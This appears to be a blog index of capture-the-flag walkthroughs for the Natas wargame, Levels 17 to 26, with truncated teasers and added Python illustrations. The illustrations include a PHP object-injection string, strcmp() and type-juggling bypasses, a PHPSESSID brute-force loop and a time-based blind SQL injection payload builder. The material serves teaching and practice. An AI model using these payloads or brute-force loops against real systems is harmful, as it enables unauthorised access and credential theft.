Author: dugisec

Natas Level 26

Today we’ll be exploiting the unserialize() function in PHP.  The major lesson here is to NEVER unserialize() user input, and I’ll show you why. PHP.net describes the serialize() function as follows: “Generates a storable representation of a value.  This is useful for storing or passing PHP values around without losing
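To see concretely why unserialize() on user input is dangerous, here is a minimal parser for PHP's serialize() format written for this page as an illustration (it is not the level's code or the post's script). The format is documented on php.net; the attacker string at the bottom, its class name SomeClass and property path are constructed for the example.

```python
"""Minimal parser for PHP's serialize() format, written for this page as an
illustration (it is not code from the level or the post).

It handles the scalar tags plus arrays and objects. The point it makes: for an
O: record the class name and every property come straight out of the string,
so unserialize() on user input hands the attacker the choice of which class is
instantiated and with what state (and PHP then runs that class's __wakeup()
and __destruct() magic methods on it).
"""
from dataclasses import dataclass, field


@dataclass
class PhpObject:
    cls: str
    props: dict = field(default_factory=dict)


class PhpUnserializer:
    def __init__(self, data: str):
        self.data = data
        self.pos = 0

    def _expect(self, ch: str) -> None:
        if self.data[self.pos] != ch:
            raise ValueError(f"expected {ch!r} at offset {self.pos}")
        self.pos += 1

    def _read_until(self, ch: str) -> str:
        end = self.data.index(ch, self.pos)
        token = self.data[self.pos:end]
        self.pos = end + 1
        return token

    def _read_quoted(self, length: int) -> str:
        # "<length bytes>": the declared length, not the quotes, delimits the value
        self._expect('"')
        value = self.data[self.pos:self.pos + length]
        self.pos += length
        self._expect('"')
        return value

    def parse(self):
        tag = self.data[self.pos]
        self.pos += 1
        if tag == "N":                       # N;
            self._expect(";")
            return None
        self._expect(":")
        if tag == "b":                       # b:0; / b:1;
            return self._read_until(";") == "1"
        if tag == "i":                       # i:42;
            return int(self._read_until(";"))
        if tag == "d":                       # d:3.5;
            return float(self._read_until(";"))
        if tag == "s":                       # s:5:"hello";
            value = self._read_quoted(int(self._read_until(":")))
            self._expect(";")
            return value
        if tag == "a":                       # a:<count>:{<key><value>...}
            count = int(self._read_until(":"))
            self._expect("{")
            result = {}
            for _ in range(count):
                key = self.parse()
                result[key] = self.parse()
            self._expect("}")
            return result
        if tag == "O":                       # O:<len>:"<Class>":<count>:{<name><value>...}
            name = self._read_quoted(int(self._read_until(":")))
            self._expect(":")
            count = int(self._read_until(":"))
            self._expect("{")
            obj = PhpObject(name)
            for _ in range(count):
                prop_name = self.parse()     # property names are s: strings
                obj.props[prop_name] = self.parse()
            self._expect("}")
            return obj
        raise ValueError(f"unknown type tag {tag!r} at offset {self.pos - 1}")


def unserialize(data: str):
    """Parse one serialized PHP value, the way unserialize() would."""
    return PhpUnserializer(data).parse()


# Constructed attacker input with a hypothetical class and property: nothing
# in the string was chosen by the application, yet unserialize() will
# instantiate SomeClass with $path set to the attacker's value.
ATTACKER_INPUT = 'O:9:"SomeClass":1:{s:4:"path";s:13:"/tmp/evil.php";}'

if __name__ == "__main__":
    obj = unserialize(ATTACKER_INPUT)
    print(f"unserialize() would build a {obj.cls} with {obj.props}")
```

The parser trusts the declared lengths exactly as PHP does, which is the whole design of the format: it was made for storing values, not for validating them, so any class with a __wakeup() or __destruct() that acts on its properties becomes reachable from the request.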

Natas Level 25

This one is one of the most involved levels so far, as there are multiple pieces to the puzzle.  Let’s jump right in: First we can see they are making an awful lot of effort to prevent us from including arbitrary files via the $filename variable.  This is a big

Natas Level 24

To win this level it would appear that we need to get $_REQUEST[“passwd”] to match the value of “censored”.  Maybe there is another way though.  Let’s see what the comments on php.net have to say about the strcmp() function. As it turns out !strcmp(“foo”, array()) returns “1” AKA “true”, For
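The mechanics behind that php.net comment, as an added Python illustration (not the level's code): a query parameter named `passwd[]` is parsed by PHP into an array, and strcmp() on PHP 5/7 returns NULL with a warning when handed an array, which `!` turns into true. The two emulation functions model only that behaviour; "censored" stands in for the real password.

```python
"""How passwd[]=x makes $_REQUEST["passwd"] an array and why that defeats a
!strcmp() check. Added illustration, not the level's code; php_request_array
and php_strcmp emulate only the PHP behaviour the walkthrough relies on.
"""
from urllib.parse import parse_qsl, urlencode


def php_request_array(query: str) -> dict:
    """Emulate the slice of PHP's query-string parsing that matters here:
    name[] collects values into a list, name[key]=v builds a dict,
    anything else is a plain string."""
    request = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.endswith("[]"):
            request.setdefault(name[:-2], []).append(value)
        elif "[" in name and name.endswith("]"):
            base, key = name[:-1].split("[", 1)
            request.setdefault(base, {})[key] = value
        else:
            request[name] = value
    return request


def php_strcmp(a, b):
    """strcmp() as PHP 5/7 behave: two strings give <0, 0, >0; a non-string
    argument (an array here) raises a warning and returns NULL, modelled as
    None. PHP 8 throws a TypeError instead, which closes this bypass."""
    if not isinstance(a, str) or not isinstance(b, str):
        return None
    return (a > b) - (a < b)


def php_not(value) -> bool:
    """PHP's ! operator: NULL, false, 0, 0.0, "", "0" and an empty array are falsy."""
    return value is None or value is False or value == 0 or value in ("", "0") or value == []


def level_check(query: str, secret: str = "censored") -> bool:
    """The level's logic: if (!strcmp($_REQUEST["passwd"], "<censored>")) -> win."""
    passwd = php_request_array(query).get("passwd")
    return php_not(php_strcmp(passwd, secret))


# Constructed requests: the bypass sends the parameter as an array, so strcmp()
# never compares anything and its NULL result negates to true.
BYPASS_QUERY = urlencode({"passwd[]": "anything"})   # -> passwd%5B%5D=anything

if __name__ == "__main__":
    for q in ("passwd=guess", "passwd=censored", BYPASS_QUERY):
        print(f"{q!r:30} -> {level_check(q)}")
```

The fix on the PHP side is to compare with `===` against a string-typed value (or check `is_string()` first); relying on `!strcmp()` treats "could not compare" the same as "equal".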

Natas Level 23

So we need to get $_REQUEST[“passwd”] to be greater than 10, AND strstr($_REQUEST[“passwd”],”iloveyou”) to evaluate to true.  Let’s examine the behavior of the PHP “>” operator: According to php.net “If you compare a number with a string or the comparison involves numerical strings, then each string is converted to a
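The string-to-number rule quoted from php.net, emulated in Python as an added illustration (not the level's code) so the two conditions can be tried against candidate passwords offline. The PHP 5/7 branch implements the rule the post quotes; the PHP 8 branch is included for contrast because the "Saner string to number comparisons" change in PHP 8 flipped the outcome for some inputs.

```python
"""PHP's loose ">" between a string and an int, emulated for the check
"passwd > 10 and strstr(passwd, 'iloveyou')". Added illustration, not the
level's code; the emulation covers the PHP 5/7 rule the post quotes and,
for contrast, the PHP 8 rule that replaced it.
"""
import re

# A numeric string per PHP: optional whitespace, sign, int/float, exponent.
NUMERIC_STRING = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")
# PHP 5/7 conversion also accepts a leading numeric prefix ("11iloveyou" -> 11).
LEADING_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?")


def php7_string_to_number(s: str) -> float:
    """PHP 5/7: take the leading numeric prefix, or 0 if there is none."""
    m = LEADING_NUMERIC.match(s)
    return float(m.group(0)) if m else 0.0


def php_gt(left, right, php8: bool = False) -> bool:
    """left > right where left may be a string and right is a number."""
    if not isinstance(left, str):
        return left > right
    if php8 and not NUMERIC_STRING.match(left):
        # PHP 8: a non-numeric string never becomes a number; the int is
        # cast to a string and the two are compared byte by byte.
        return left > str(right)
    return php7_string_to_number(left) > right


def php_strstr(haystack: str, needle: str):
    """strstr(): the haystack from the first occurrence onward, or false."""
    i = haystack.find(needle)
    return False if i < 0 else haystack[i:]


def passes_level(passwd: str, php8: bool = False) -> bool:
    """Both conditions of the level: passwd > 10 AND strstr(passwd, "iloveyou")."""
    return php_gt(passwd, 10, php8) and php_strstr(passwd, "iloveyou") is not False


if __name__ == "__main__":
    for candidate in ("iloveyou", "11iloveyou", "2iloveyou", "100"):
        print(f"{candidate!r:14} PHP7={passes_level(candidate)!s:5} "
              f"PHP8={passes_level(candidate, php8=True)}")
```

"11iloveyou" satisfies both conditions on every PHP version: under PHP 5/7 it converts to 11, and under PHP 8 it is compared as a string against "10". Note that on PHP 8 even "iloveyou" alone passes, because "i" sorts after "1" bytewise, so the ">" check is no real barrier there either.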

Natas Level 22

If you thought the last level was easy, this one is even easier. All we have to do is set revelio=1 for the win:

Natas Level 21

This one was really easy: all we have to do is set admin=1 for the win. Let's try: Well, that didn't work. What's up with this experimenter thing anyway? I wonder what would happen if we used the PHPSESSID from that and made the same request? Oh...that's what happens.

Natas Level 20

There is a lot of code in this one, so let's focus on some of the more important parts: Line 23 tells us we need to set $_SESSION["admin"] == 1 for the win. We don't have direct control over the $_SESSION array, but the following code offers an

Natas Level 19

This is a really fabulous hint. We know we'll have to brute force the session ID again, and we also know the pattern is not sequential like the previous level, so let's start checking out some sample session IDs: Hmmm, all the session IDs consist of letters a-f and digits

Natas Level 18

No matter what you log in as it says “You are logged in as a regular user. Login as an admin to retrieve credentials for natas19”. We need to get the session where $_SESSION[‘admin’] == 1, but how do we know which PHPSESSID is associated with this? Well earlier in
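A session-ID brute-force loop of the kind both this level and the previous one call for, added here as an illustration rather than the post's own script. The probe is pluggable: fake_server is a constructed stand-in so the example runs offline, and ADMIN_TEXT, the sequential-ID assumption and the constructed hex sample are all assumptions; against the level you would replace the probe with an HTTP request carrying the candidate in the PHPSESSID cookie. decode_hex_session is the first check worth running on IDs made only of [0-9a-f], like the ones in Level 19.

```python
"""A generic PHPSESSID brute-force loop, added here as an illustration (not the
post's own script). The probe is pluggable: fake_server is a constructed
stand-in so the example runs offline; against the level you would replace it
with an HTTP request that sends the candidate in the PHPSESSID cookie (the
level's basic-auth credentials and URL are assumed, not shown here).
"""
import string
from typing import Callable, Iterable, Optional

# The failure text is quoted in the post; the success text is an assumption.
REGULAR_TEXT = ("You are logged in as a regular user. "
                "Login as an admin to retrieve credentials for natas19")
ADMIN_TEXT = "You are an admin."     # assumed

FAKE_ADMIN_SESSION = "437"           # constructed: the one id the fake server treats as admin


def fake_server(session_id: str) -> str:
    """Constructed stand-in for the level: returns the page body for a cookie."""
    return ADMIN_TEXT if session_id == FAKE_ADMIN_SESSION else REGULAR_TEXT


def sequential_ids(limit: int) -> Iterable[str]:
    """Candidate generator for a server that hands out sequential numeric ids."""
    return (str(i) for i in range(1, limit + 1))


def find_admin_session(candidates: Iterable[str],
                       probe: Callable[[str], str]) -> Optional[str]:
    """Try each candidate as PHPSESSID; return the first one the server treats as admin."""
    for sid in candidates:
        body = probe(sid)
        if ADMIN_TEXT in body:
            return sid
        if REGULAR_TEXT not in body:
            # Anything else means the probe is broken (auth failure, rate limit),
            # and silently continuing would just burn the whole keyspace.
            raise RuntimeError(f"unexpected response for session {sid!r}: {body[:60]!r}")
    return None


def decode_hex_session(session_id: str) -> Optional[str]:
    """For an id made only of [0-9a-f]: if it is even-length hex that decodes
    to printable ASCII, return the decoded text, so you can see whether the id
    is really just an encoding of something guessable."""
    if len(session_id) % 2 or any(c not in string.hexdigits for c in session_id):
        return None
    raw = bytes.fromhex(session_id)
    return raw.decode("ascii") if all(32 <= b < 127 for b in raw) else None


if __name__ == "__main__":
    print("sequential search found:", find_admin_session(sequential_ids(1000), fake_server))
    print("hex id decodes to:", decode_hex_session("68656c6c6f"))   # constructed sample
```

Keeping the candidate generator separate from the probe is the point: once the ID scheme is understood, only sequential_ids changes, and the same loop and the same "did the page say admin" check carry over.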

Natas Level 17

Our username check is back, and this time it’s not telling us anything: It looks like they forgot to uncomment all the messages before they published this file.  That’s ok, we can take the same strategy as the other blind sql level, and use an if statement combined with the
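The extraction loop that goes with an IF()-based blind injection, added as an illustration (not the post's script). The query shape behind time_based_payload, the user name natas18, the column name password and the sleep length are assumptions; constructed_oracle stands in for the database so the example runs offline, where against the real target the oracle would send the payload and treat a slow response as "yes". It goes one step past the text by binary-searching each character's ASCII value instead of trying every candidate letter.

```python
"""Blind SQL injection driven by an IF(): extract a secret one character at a
time from a yes/no oracle. Added illustration, not the post's script. The
query shape behind time_based_payload and the column/user names are
assumptions, and constructed_oracle stands in for the database so the
example runs offline; against the real target the oracle would send the
payload and treat a slow response as "yes".
"""
from typing import Callable

SLEEP_SECONDS = 3   # assumed delay for the TRUE branch


def time_based_payload(position: int, threshold: int, user: str = "natas18") -> str:
    """Username-field payload for an assumed query of the form
    SELECT * FROM users WHERE username="<input>". Only the TRUE branch sleeps,
    so the response time answers: is the character at `position` > threshold?"""
    return (f'{user}" AND IF(ASCII(SUBSTRING(password,{position},1))>{threshold},'
            f'SLEEP({SLEEP_SECONDS}),0) AND "1"="1')


def extract_secret(oracle: Callable[[int, int], bool], length: int) -> str:
    """Binary-search each character's ASCII value over 0..127 with
    oracle(position, threshold) == (char > threshold): 7 questions per
    character instead of one per candidate letter."""
    secret = []
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(pos, mid):
                lo = mid + 1
            else:
                hi = mid
        secret.append(chr(lo))
    return "".join(secret)


# Constructed secret and oracle: the oracle answers exactly the question the
# SQL IF() would, without any network or database.
CONSTRUCTED_SECRET = "s3cr3tPassw0rd"


def constructed_oracle(position: int, threshold: int) -> bool:
    return ord(CONSTRUCTED_SECRET[position - 1]) > threshold


if __name__ == "__main__":
    print("example request body:", time_based_payload(1, 64))
    print("recovered:", extract_secret(constructed_oracle, len(CONSTRUCTED_SECRET)))
```

With a time-based oracle the cost of a wrong answer is a false "yes" from network jitter, so in practice the real oracle should measure against a baseline request and repeat any borderline measurement before trusting it; the search itself is unchanged.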
